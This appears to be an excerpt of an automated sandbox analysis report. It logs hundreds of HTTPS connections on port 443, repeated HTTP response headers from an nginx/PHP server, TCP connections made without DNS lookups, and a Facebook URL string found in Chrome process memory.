Source: unknown	Network traffic detected: HTTP traffic on port 50632 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50332
Source: unknown	Network traffic detected: HTTP traffic on port 50873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50335
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50334
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50348
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50349
Source: unknown	Network traffic detected: HTTP traffic on port 50505 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50342
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50341
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50344
Source: unknown	Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50345
Source: unknown	Network traffic detected: HTTP traffic on port 50673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50359
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50358
Source: unknown	Network traffic detected: HTTP traffic on port 50804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50351
Source: unknown	Network traffic detected: HTTP traffic on port 50317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50350
Source: unknown	Network traffic detected: HTTP traffic on port 50558 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50353
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50355
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50354
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50357
Source: unknown	Network traffic detected: HTTP traffic on port 50374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50356
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50360
Source: unknown	Network traffic detected: HTTP traffic on port 50620 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 50419 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50369
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 50255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 50685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50362
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50361
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50364
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50363
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50365
Source: unknown	Network traffic detected: HTTP traffic on port 50897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50367
Source: unknown	Network traffic detected: HTTP traffic on port 50923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50371
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50370
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50779
Source: unknown	Network traffic detected: HTTP traffic on port 50911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50778
Source: unknown	Network traffic detected: HTTP traffic on port 50571 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50774
Source: unknown	Network traffic detected: HTTP traffic on port 50350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50607 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50304
Source: unknown	Network traffic detected: HTTP traffic on port 50444 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50303
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50306
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50305
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50789
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50308
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50307
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50309
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50780
Source: unknown	Network traffic detected: HTTP traffic on port 50702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50300
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50301
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50785
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50476 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50315
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50314
Source: unknown	Network traffic detected: HTTP traffic on port 50791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50317
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50319
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50318
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50311
Source: unknown	Network traffic detected: HTTP traffic on port 50394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50619 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50313
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50797
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50312
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50796
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50325
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50328
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50327
Source: unknown	Network traffic detected: HTTP traffic on port 50828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50329
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50320
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50321
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown	Network traffic detected: HTTP traffic on port 50488 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50323
Source: unknown	Network traffic detected: HTTP traffic on port 50746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50514 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50296
Source: unknown	Network traffic detected: HTTP traffic on port 50915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50295
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50297
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50299
Source: unknown	Network traffic detected: HTTP traffic on port 50389 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50537 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50502 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50550 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50390 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50549 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50481 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50665 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50365 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50259
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50424 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50254
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50253
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50258
Source: unknown	Network traffic detected: HTTP traffic on port 50353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50257
Source: unknown	Network traffic detected: HTTP traffic on port 50456 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50261
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50260
Source: unknown	Network traffic detected: HTTP traffic on port 50848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50574 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50265
Source: unknown	Network traffic detected: HTTP traffic on port 50639 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50264
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50269
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50268
Source: unknown	Network traffic detected: HTTP traffic on port 50264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50271
Source: unknown	Network traffic detected: HTTP traffic on port 50677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50468 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50276
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50279
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50281
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50283
Source: unknown	Network traffic detected: HTTP traffic on port 50412 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50282
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50341 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50285
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50284
Source: unknown	Network traffic detected: HTTP traffic on port 50689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50287
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50286
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50288
Source: unknown	Network traffic detected: HTTP traffic on port 50893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50290
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50291
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50294
Source: unknown	Network traffic detected: HTTP traffic on port 50799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50293
Source: unknown	Network traffic detected: HTTP traffic on port 50562 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50627 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50357 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 16:59:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:00:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:00:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:00:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2

Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.102.62
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.102.62
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.6.115

Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php! equals www.facebook.com (Facebook)
